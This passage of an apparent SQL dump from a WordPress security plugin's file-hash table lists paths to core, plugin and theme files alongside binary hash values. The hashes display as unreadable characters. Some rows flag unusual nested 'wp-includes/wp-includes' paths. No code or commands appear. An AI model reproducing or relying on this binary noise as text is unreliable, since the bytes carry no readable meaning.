A��','',0,'?'),('���?ڟ�E���$PF','wp-includes/pomo/translations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��^R�3a�q�MC�[�','�t�e��|�*�O���qj���O���{�\0NI�','',0,'?'),('��hY)�W�\'�v\'�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/TaskQueueInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aȭy��M�ir�\rBcT','|I�/߰��V�z���*�ș\"�X/�m��Aŋ\\','',0,'?'),('�է\n\'y���ј��','wp-content/plugins/wordpress-seo/src/integrations/admin/health-check-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�6�힮K|ńDϩ','��ǎc�|3�Rj8B��2��C�h]�4xe�','',0,'?'),('���u�ۜ�*���','wp-content/plugins/disable-gutenberg/inc/settings-reset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+ButO��I�����',')��-<\rYB	&z��T�ag@�>�)�X��x�','',0,'?'),('���6��b�g�>_�','wp-includes/images/wlw/wp-watermark.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��uMmܭD|�w���D','�S��nR�\'��X�^���kh����ɑ�i�7�','',0,'?'),('��:����^�	6T4�','wp-content/plugins/wordpress-seo/src/repositories/primary-term-repository.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f����Wc7^\r���','Q�bo�1���[+i�<�X�`K)ͽW�,�0�','',0,'?'),('���Z�C?��Ԟ��','wp-includes/wp-includes/sodium_compat/src/Core32/HChaCha20.php',0,'9�5��e�f��#�ϝ','9�5��e�f��#�ϝ','��i��\rC��\"Գ�\r4��8�c��S��','',0,'?'),('��B\0��ia�H�x�y','wp-content/themes/hitmag/inc/kirki/deprecated/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&@�\0�swn�b��e�','�L��doK���_E\\����帇�N�[�=f}�','',0,'?'),('������8�j��c}�','wp-includes/blocks/rss/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��8^/��4�?{�','#�t�#�Ͻg߆>l8����Z,hT�4~�E|','',0,'?'),('�h�x�*(�&���kO�','wp-content/plugins/wordfence/views/blocking/country-block-map.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��yGF�,{��X�z','%Ԝ5��;�����x��^)���G(��o','',0,'?'),('�����\'K�z�f��','wp-includes/customize/class-wp-customize-header-image-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�ܦ����^�u`0��','9�2��8Uљo��>y]���X^(*VcT�Ѭ�7�','',0,'?'),('��5#�\"8�%`}','wp-content/wflogs/template.php',0,'lC�db��.�˴�v','lC�db��.�˴�v','Z][W��P�}�,������7*�q��\n��Ƒ��','',0,'?'),('�\r�f����h�8�!','wp-includes/Requests/Exception/HTTP/500.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I(vrMm�(�c\0{  \n','FO���V3\"���������!k�P�','',0,'?'),('�Hc���1�ް�=','wp-content/plugins/wordpress-seo/admin/views/tool-file-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݴ@�����+V�z�','v\\i~:Q��� ����<�4/�tA�����>D?o','',0,'?'),('���v9�b�$�L','wp-includes/random_compat/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,9�����G�','h������ͼ�����ƾek��Y���\Zf�m','',0,'?'),('�#�?���Gc	¯l1e','wp-includes/class-wp-theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}K\'x�����*�','���pV�D.*��	^g#���>\r�)��0��׊���','',0,'?'),('�)Ϊ@��)b��X[N�','wp-content/plugins/wordpress-seo/src/config/wincher-pkce-provider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����7��hk��.�{','9�䅠������NTא��z�NQ�����Z-','',0,'?'),('�@V��T��L\'�~�i�','wp-content/plugins/wordpress-seo/admin/class-yoast-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E}(,;�q�ٲ���L��','ŧ�AwxH��(}Dt&�粂N\Z����r[&I�','',0,'?'),('�EW]Vݐ�Ձ�6�]�\0','wp-includes/wp-includes/class-wp-simplepie-sanitize-kses.php',0,'\0s�7�^�GU���_','\0s�7�^�GU���_','�EJ�\'{6�i���|�~�c��/�l','',0,'?'),('�H�����Pw��%8��','wp-includes/images/smilies/icon_sad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ix�o��TMz��D-','�b5�yh�9���}���o��W�I��n�n�','',0,'?'),('�I]�Sf��]���','wp-content/plugins/wordpress-seo/src/services/indexables/indexable-version-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MquV�֢_�h�N��','D�\n݆j6d5���<��Lˤqݕ�}�m���N�','',0,'?'),('�I��Tݩ��~��7�','wp-content/plugins/wp-cerber/languages/wp-cerber-de_DE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�\'Ny�`���[','��	l���)�\n���g���*�u�^L=','',0,'?'),('�K�{�*�)�����','wp-content/plugins/all-in-one-wp-security-and-firewall/js/wp-security-admin-script.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z���a��Գ8�*�L','��wL�\rd�Ê��3��<\'\n�:&̉��$޲3$O','',0,'?'),('�Q49��Lz�J�','wp-content/plugins/wordfence/lib/wfUtils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_6��,����)���~','�Gd��[��e��`�V(i�=Rd�AG;�\0@�','',0,'?'),('�S�l<�!�*,��u�2\r','wp-content/plugins/wp-smushit/app/common/footer-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<�~�-�:��','�����g1�{G��},Hn�%9�ҫu���','',0,'?'),('�XX*��!2�~�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eb:lx-�<��s99`','�,��{ m��Z��BV�TL�;*���<','',0,'?'),('�[�n�G{�\'��q:�','wp-includes/ms-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���iL�+|�r�S�','꺵0Z}�ɈH����j`�-�3n�Ay2[0Ysh�','',0,'?'),('�\\�h� R�X�<�C�','wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���߅�w@L��O�R','��EF�j���r�č;s��΀.f:��Ϥ�F','',0,'?'),('�])��Vn;�Z���q�','wp-content/plugins/wp-cerber/assets/flags/mz.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>ʈN^*�=��nKT','0B7���yK�l�6M̆HG]�ݽP)p�?','',0,'?'),('�c����6��~�6̐','wp-includes/blocks/button/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ȫ�[z������','�1�jʋ�S��w8��R�h��,�c@��z0�¯�','',0,'?'),('�hI0��J2��[o���	','wp-content/plugins/wordpress-seo/js/dist/import.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b$L��4��Hӹ7','��,Y8Kf�21�$��H^C�Tߖ�G��M|��','',0,'?'),('�qm��(�w�\rx��','wp-content/plugins/wp-smushit/app/assets/images/plugins-hummingbird.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G}З�v�\r��&�','>_埁K\'o���\'G�\Z)J�k�~\\-���>�','',0,'?'),('�����ʊn���Z','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemap-image-parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TW����ξ/?m��#','IkQu����J\0�±lb<����s�1t�+@g�','',0,'?'),('����\Z7�8�-\\�~�','wp-includes/css/dist/edit-post/classic-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K�\Z�/sݔ�+��','�g�L\"��)���~i��N*~U?��C��B��P','',0,'?'),('��lv\"�(����','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/ClientInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��\r\\��7�%��','�+B�����7�x�֛�3P��Z��\'��?#��','',0,'?'),('����-�\"h���','wp-content/plugins/wordpress-seo/src/models/seo-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�౯��ջ&�;�\rX','�V=B��_�(a��C�(��a=��4_`�U���','',0,'?'),('��3_���[#�g`�','wp-includes/css/dist/block-library/reset-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jʵ�`��l٪����j','��x�c}\r����m�h�\nY��\r�ޒF�m2','',0,'?'),('��Y7����yZn��\0','wp-includes/wp-includes/js/jquery/ui/menu.min.js',0,'e��\"f_�2�eg�','e��\"f_�2�eg�','�{�B��x��\r;f	�2��4�/����4E�','',0,'?'),('��eN#x�ܕ���{','wp-includes/wp-includes/class-wp-http-requests-hooks.php',0,'�,ͣa4h��D�U�+','�,ͣa4h��D�U�+','�5���կzV��Rt�I/�+˘H0N����\'C','',0,'?'),('��J�ח�_yzx�6O','wp-admin/network/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��>�H\r��5:�6�','*]X8���%�KқR	���Q�f�;\ne�\r�6\\','',0,'?'),('��_´T�������','wp-includes/wp-includes/rest-api.php',0,'W�ם�Z�1I$\'O�','W�ם�Z�1I$\'O�','�|\r�j���͞�;#�\nZ�0�|�Iݩ���','',0,'?'),('���Ȁ�~_q�I��S�','wp-admin/js/password-strength-meter.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z��3�r�;]�<|�','����1��y吥!�}}�3ɻ}}�te\nt�','',0,'?'),('���\\�D �>�F,���','wp-admin/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���c�!�X,�8a6�','�2��H��:�]����Ճ�ē��?\"�+','',0,'?'),('��l�aމ���L��','wp-includes/css/dist/edit-site/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ͥ�f�Hq���U','�1&��;�aU�m�H\\��,^��&\"P�!','',0,'?'),('����T�v^�n�f�','wp-content/themes/hitmag/inc/kirki/controls/views/select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ך[�����뫊�3MN&','�3�Q���`���g����]>f�ڢ���[}P','',0,'?'),('��zc|��ـ�vM','wp-includes/wp-includes/css/dist/block-library/style.min.css',0,'����{`�q���\'2P','����{`�q���\'2P','Wf�y�����7hc��ajkgd�4��8�ɢ��','',0,'?'),('��x�z��z��jMH��','wp-includes/wp-includes/class-wp-http-response.php',0,'��4��y�K���ߕ','��4��y�K���ߕ','�Ι	��[�{\0If�\0�t��v\n9d����x��','',0,'?'),('��$ \'�6�y�T}3�','wp-includes/wp-includes/js/mediaelement/renderers/vimeo.min.js',0,'�C9���Y�O���','�C9���Y�O���','���+�®-FVp�ݨIht�L�iP%K��i��6','',0,'?'),('��	�\")�\"��0I�o��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��q\Zs��q776�','C�D�a�$�=�f[Q�4�JW�7l)�.�=%��','',0,'?'),('���?\Z	5H��t��3�','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-repeater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P��ā�L���p���','G<���U��\0��yO����/M�|JPV>','',0,'?'),('��re}/�D���>','wp-content/plugins/wordpress-seo/src/helpers/open-graph/image-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ޢ��@�� ��\\�','*��u�z����jM�T�j\0�ȫ���io1','',0,'?'),('���ꔕTs�\r%�LJ�M','wp-includes/blocks/spacer/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)vwA�r��4֥�\\','aʴ�-%M�\'�Sm�]�s����Z�\0C�-','',0,'?'),('�������&Ż�(','wp-admin/js/widgets/custom-html-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�	k����c��\'�','�r=,k�M:�Dy�K��F��~�sS�|ğ�Z��','',0,'?'),('��~+�q�X��\"`','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oaQ���|g�4&��','�c�U�X����+�]Wvd�=�,����Z0)\\�','',0,'?'),('�\n:��e n`�T��m�','wp-content/plugins/wp-smushit/_src/js/smush/smush.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e���tZ�ϵA��','[?%.aZ��so�,��� ��Pd/��M�i�','',0,'?'),('�]~���K*Ղ㈔','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js',0,'��lS?,�ra�4;�^F','��lS?,�ra�4;�^F','�D�;�䏑��eH�i�b�\Z�?�b����','',0,'?'),('����)1����','wp-content/plugins/wordpress-seo/admin/class-admin-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I8�Wef�g���','�%-N;γ5D�۸�d���V3S�C��yu��','',0,'?'),('�6��0��)H2�����','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Cookie/FileCookieJar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tR�u��b#4�8�ȯ','����.8ޒ�^��U�sN�4׃}_w�$0','',0,'?'),('�\\�`7O+�8�t�C��','wp-content/plugins/redirection/locale/json/redirection-zh_TW.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s\'gn5����%�86','�չI3�uS�w70�UԢ�%N<� i�Տ%��','',0,'?'),('�f�L4\"�oS��A�','wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Regular-Italic.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*���|�՗�%9','\n�w,[�Q��(ކA߸WM��%��C{��','',0,'?'),('�j\Z�;��\r�e���','wp-includes/rest-api/endpoints/class-wp-rest-global-styles-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T-G:���\Z���?%�z','/+ԋ�nO��/�;l-p�N���\Z�5&�w\ZT�)','',0,'?'),('�n�j�ܙh�r.l��\0','wp-content/plugins/wordpress-seo/js/dist/admin-modules.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vv�0�aP�,�\"t','s7�㇍�V�l+\0<�4^0_�d7k\00G��lG','',0,'?'),('�|Y�!�9��c!YQ','wp-includes/wp-includes/media-template.php',0,'��]p�uA@j4� k','��]p�uA@j4� k','|p��!NR�o�*mc�>�8��t���f5-\Z;m6','',0,'?'),('��吠��*+B����$','wp-content/plugins/wordpress-seo/src/deprecated/admin/onpage/class-ryte-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�m$���\r��f\Z,ñ','*&��ys;&��7�����/��M��JB��','',0,'?'),('��=CѠ��*TX�4','wp-admin/css/colors/_variables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�&\n�Q�ܰ�b^,','�p�&��<6oJ�AxGc�ԁl���Ǧ�o','',0,'?'),('��\'���i��3�����','wp-content/plugins/wordpress-seo/src/integrations/admin/indexing-tool-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]ҴDm͵\'��qM7�','X�SP��G_B�	Y�>�v��-\">`�\"��','',0,'?'),('����;X�3�j����','wp-includes/wp-includes/sodium_compat/lib/php72compat_const.php',0,'XP�sHG�/n�w','XP�sHG�/n�w','�-ܙ���_�P^�C����`ֵ�.���F�If','',0,'?'),('��&�ܕY̮&M���','wp-content/plugins/wordpress-seo/src/deprecated/admin/taxonomy/class-taxonomy-content-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X��E�@u����','� ��쫁�B٥\'R�J�Rχ�\n��|84u�','',0,'?'),('��ڷt�g�Z�gE�','wp-includes/class-wp-http-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%*T�/�l��,�I�\0$','�Ң���.��g�L��kJ#���/ZF]��m','',0,'?'),('��K5E�,\\��l�','wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js',0,'=���B�9�$v\r	','=���B�9�$v\r	','�X�-��y���H��VKr�V��Y˴t���X��','',0,'?'),('��9f7l�R��>��P','wp-includes/blocks/comments/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �D��ܦ��Xܒ','v�~w0����]�y��x6�$�|��SD�S�)','',0,'?'),('����߇�w�b�vԸ','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-it_IT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��nT:�>��y�\Z��','�Ġ��;��Z˦�;-j@ߦ�jE	mK%','',0,'?'),('��jT�ct��Q��#','wp-includes/blocks/navigation/view.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D~W���e��*n�','�ӡ�pŗkl��t,�\n��܉\nr{L!��ވ','',0,'?'),('�� ��It13&','wp-admin/js/nav-menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DP��MG�d.~i��^','�RH��TDǧ`$�4�Ueڰ�<A}X.ѩ$','',0,'?'),('���G�l���ݠ_�','wp-includes/js/dist/date.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�鐸�zn[\\��e\"','\0�gk��]�>N�Қ��3:�֜5�M�&�<{��','',0,'?'),('�0E&ʖtVw,�A��','wp-includes/wp-includes/images/media/document.png',0,'v�4�8�Αy�6�d�','v�4�8�Αy�6�d�','��ø`�������f	I$ _Z�X�\"0\r��,','',0,'?'),('�J-狁��\\\"�ץ&�','wp-includes/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&RЄs��uT-&3B�','�D��y)?��3�>\'9\'qu|D7�+�C','',0,'?'),('�$��\n]^�z�3��','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-sortable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$E\\4K���4v','�j�S$%%Ȇ)t��i^:r�h�H1j]�J��C�','',0,'?'),('�;?2��S��\0��p','wp-admin/customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�؞��/bT�cK	W��','=�M��\"۟����8S��-ܔ��K�<�@��~�o','',0,'?'),('�W�-�ى��|�Ǘ��','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-stop-users-enumeration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݪ8�C+�UM\\���','F�_�n����Z�-y}OJ���P(�C�2\n','',0,'?'),('�X��@��%�1C��i','wp-content/plugins/wordfence/images/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m]�a���\\$��','Ǘ�h?���S���)�:���i@h.��X�g��','',0,'?'),('�[�?��n2��\"d�d','wp-content/plugins/wp-cerber/assets/bn4ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8��L���uLT�','�TZ�G���~S-�{&M:�\r��/7O���T�','',0,'?'),('�]�.�1\rPXL�','wp-admin/includes/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��ls<R�j�\rd=','�\naO��i��a��nkh�T�]�*�R�86�','',0,'?'),('�^���� ��O���','wp-content/plugins/wp-smushit/app/assets/js/smush-clipboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��T�kP�i�w�P','9���a��})M���J\Z��:7V`�`+�?�7','',0,'?'),('�e�$w�dx�0��_v�','wp-content/plugins/wordpress-seo/css/dist/inside-editor-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J\Z����6���ǜ','.TLêr���cB�ݑR�x��ܐ�H���1f','',0,'?'),('�f(�9��6��yaN|2','wp-content/plugins/wordfence/waf/pomo/translations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z^:@��JKL����S','�\rH����n`�>�--\\Tr���7,��','',0,'?'),('�l_S�	9�����[','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�(��a�#T��US��|','d��q�����Q��n�i��I��/`�Y�A��','',0,'?'),('�rY��\0�S���(z|�','wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Gb�yf��|��S���','�o��G5}[�`�n��x���ܡ^�@B#���lb','',0,'?'),('�s8��\'��ɀ�\Z%Cx','wp-includes/blocks/archives/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�4�M��ß;�H���','�Fh���I$���l�f��B2�,�سl8�6j�;','',0,'?'),('�u$�{���ܨ��v�','wp-includes/blocks/latest-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9��_�G|��6%�','��T�rQN��4�VJ:�\0�7Ր�z�Na�\r','',0,'?'),('�~K�Ɂ�wwf�C�','wp-admin/js/widgets/media-gallery-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�c/����I���<�','�y�\\�R�T�ܠ�U�tmY�(��㻱̿','',0,'?'),('��}z��#����\Z','wp-includes/Requests/IRI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e���(a�d�\Z�C','��\"����G��-��O��\'��B� �^','',0,'?'),('��\r���[��\0�EuJ','wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�t��rV!��m兩','O��u�8�9���.�8W�y\"c��','',0,'?'),('��4�y�3%k� ����','wp-admin/js/widgets/media-image-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;k�#?��cQ7��(e','�o��{�\rr�h5��F�w�w�	L�e�Fz�]�','',0,'?'),('����%�|��%~��X>B','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-custom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�T2G�=���g�','�2�C�o�\r�}qxQ��Y)<�\nWv\"���>sV�*','',0,'?'),('��.!��7h\0��*��','wp-content/plugins/wp-smushit/app/pages/class-tutorials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F�\n+r��Gm�,!�','�TȬ��I��*����fP8쯹7���','',0,'?'),('������|� ��','wp-includes/js/masonry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';?�&��T�Je�xH','$��!�|=#f�c�jc���:��T�Q0b�,ʉ�','',0,'?'),('��ؽa��\r�(��$�','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�We�U{�9�','������G����8�=�\0�> �3�wg3.�4','',0,'?'),('��Θ��r(��Ł�� ','wp-admin/js/auth-app.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#���LP���S[��f�','F@H���8�݇��7an���#{�����j�','',0,'?'),('���t��I��.����','wp-content/plugins/redirection/api/api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��#�k��4;�7V�','���i�uܭ�/�э�`=Z�YC�����`','',0,'?'),('���v{C����ҧ��4I','wp-content/plugins/wordfence/lib/wfViewResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�����\"J�3Z��w','�m��e�=�H��oD���OT�\0�v���','',0,'?'),('��JL��[q��&�D=r','wp-includes/wp-includes/sitemaps/class-wp-sitemaps.php',0,'5.R�\0I�u�\'tV�','5.R�\0I�u�\'tV�','g���e��;�_~�_f/Pv��hm�H��g�','',0,'?'),('���\0뀄	;t�/��-','wp-includes/blocks/file/view.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8�,��O��Ƙ','����m�M�Ђ0���6�l	Pʂc��Mo','',0,'?'),('��p�$^���d�Z','wp-admin/network/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%(F��v\0�~��F','ڙs-s���~�uYe������T��F�4�!� *','',0,'?'),('��c�R�f3�p5�','wp-content/plugins/redirection/modules/apache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p`�se��5XgC�\n��','bM[M�-��b\'�c~Tk�t���кG��','',0,'?'),('��[K���b���28�','wp-includes/pomo/po.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�.���^�q��S�^y','�=��A�\'�TW��Z�\Z商��lI��\'�y\\�C','',0,'?'),('��4ih=�g����7�','wp-content/plugins/wordpress-seo/src/services/health-check/postname-permalink-reports.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�+�=��S�GƓ','�ݩީ�MKX�$3}�i3�F{Ȣ��D\'wE��','',0,'?'),('�����JH�l\"G�L�','wp-includes/css/dist/block-library/reset-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�D܁�ȦD�P\\�','|$������7��vuVjj�������0\"���','',0,'?'),('���`I�oms�S!�','wp-content/plugins/redirection/locale/redirection-en_GB.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���)�ף=�Di؜�','�M	����֮��6\"c;S\Z�_����\r�Zt4R','',0,'?'),('���X����J��p','wp-content/plugins/wordfence/lib/wfBrowscapCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T����Q�x�j�','�����1Y����T��Ј�q�W6݋���h	','',0,'?'),('�6�UØ�c	o=��','wp-content/themes/hitmag/inc/customizer/assets/imgs/1cc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�$RUw��ťI','��w��o�WC��ON��.�fL��\Z%\Zh, E\n�','',0,'?'),('�9�[�E:Ѷq	��A','wp-includes/blocks/calendar/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','14-�9F�&5f4��(','�g����j�v ���AU��$jl�?��…���','',0,'?'),('�#�\n���ɰ���Ђ�','wp-includes/blocks/query-title/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�l�¥ˀ����3','d\"Q�٥[�Rf?а-[1�����#x�r,md\r_','',0,'?'),('�*42/�>E૓�2','wp-content/plugins/redirection/locale/redirection-el.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��0P\0��%2��','�^����2�=����My���W��=�a\Z<l�t','',0,'?'),('�,�3�!x���7�N0��','wp-includes/wp-includes/class-wp-paused-extensions-storage.php',0,'%�ʤ�O��.�LX','%�ʤ�O��.�LX','UY����ޖ\\\nj6h��́��bYn��5��','',0,'?'),('�J랿�h#�:!^`�=�','wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rv,%�f�n���2T��','ᒠ�#0���q*n\\\\!����́\'�A%�!.k','',0,'?'),('�S���q�`���M�','wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=B���\nyNx{��','�E��zB�4�/�p�Ř�\r�۞.�B���3','',0,'?'),('�YxF�^e\'���$�ƭ','wp-content/plugins/wordpress-seo/src/services/health-check/curl-check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!���O�\0!�k�0��','r<^z�iѷ=�\0V��\\3~� �6&O`$�','',0,'?'),('�]_�\Z?ʤ��wHo�','wp-includes/blocks/avatar/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n���/V���A�*','h�I<F)EWʡ��� �z�<�{N\0�ۊ��>�','',0,'?'),('�kx��)u��]�#��','wp-content/plugins/wordpress-seo/vendor/composer/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��r���li@_͈0','�y��YU)Dzɾ6\r���2r�(5��j7R','',0,'?'),('�n֢��\r�V5��,�','wp-includes/widgets/class-wp-widget-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j�+(,�^�b��(','��PL+w��it���Z��d���kZ{X�V`�t�','',0,'?'),('�o����l>��x~I� 